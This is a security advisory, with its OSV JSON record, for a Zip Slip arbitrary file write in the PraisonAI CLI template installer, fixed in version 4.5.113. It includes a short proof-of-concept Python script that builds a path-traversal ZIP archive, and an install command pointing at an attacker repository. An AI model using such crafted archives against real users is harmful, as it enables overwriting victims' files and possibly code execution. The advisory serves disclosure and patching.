GHSA-4PH2-F6PF-79WV
Vulnerability from github – Published: 2026-04-06 23:08 – Updated: 2026-04-07 22:09The PraisonAI templates installation feature is vulnerable to a "Zip Slip" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's zipfile.extractall() without verifying if the files within the archive resolve outside of the intended extraction directory.
Details
Location: src/praisonai/praisonai/cli/features/templates.py (Line 852)
Vulnerable Code snippet:
zip_ref.extractall(tmpdir)
During installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using zip_ref.extractall(tmpdir). A specially crafted ZIP archive can contain file entries with relative paths (such as ../../../../tmp/evil.sh). If extracting this archive in older Python versions or environments where extraction rules aren't strict, extractall will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim's filesystem.
PoC
- Generate a malicious zip payload:
import zipfile
with zipfile.ZipFile('malicious_template.zip', 'w') as z:
# Adding a file that traverses directories
z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip')
- Trick a user into installing the malicious template:
praisonai templates install github:attacker/malicious_template
- Observe the
zip_slip_pwned.txtfile created in/tmp/on the victim's machine.
Impact
This is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.5.112"
},
"package": {
"ecosystem": "PyPI",
"name": "PraisonAI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.113"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-39307"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-06T23:08:55Z",
"nvd_published_at": "2026-04-07T17:16:36Z",
"severity": "HIGH"
},
"details": "The PraisonAI templates installation feature is vulnerable to a \"Zip Slip\" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python\u0027s `zipfile.extractall()` without verifying if the files within the archive resolve outside of the intended extraction directory. \n\n### Details\nLocation: `src/praisonai/praisonai/cli/features/templates.py` (Line 852)\n\nVulnerable Code snippet:\n```python\nzip_ref.extractall(tmpdir)\n```\n\nDuring installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using `zip_ref.extractall(tmpdir)`. A specially crafted ZIP archive can contain file entries with relative paths (such as `../../../../tmp/evil.sh`). If extracting this archive in older Python versions or environments where extraction rules aren\u0027t strict, `extractall` will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim\u0027s filesystem.\n\n### PoC\n1. Generate a malicious zip payload:\n```python\nimport zipfile\n\nwith zipfile.ZipFile(\u0027malicious_template.zip\u0027, \u0027w\u0027) as z:\n # Adding a file that traverses directories\n z.writestr(\u0027../../../../../../../tmp/zip_slip_pwned.txt\u0027, \u0027pwned by zip slip\u0027)\n```\n2. Trick a user into installing the malicious template:\n```bash\npraisonai templates install github:attacker/malicious_template\n```\n3. Observe the `zip_slip_pwned.txt` file created in `/tmp/` on the victim\u0027s machine.\n\n### Impact\nThis is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).",
"id": "GHSA-4ph2-f6pf-79wv",
"modified": "2026-04-07T22:09:54Z",
"published": "2026-04-06T23:08:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4ph2-f6pf-79wv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39307"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
},
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI Has Arbitrary File Write (Zip Slip) in Templates Extraction"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.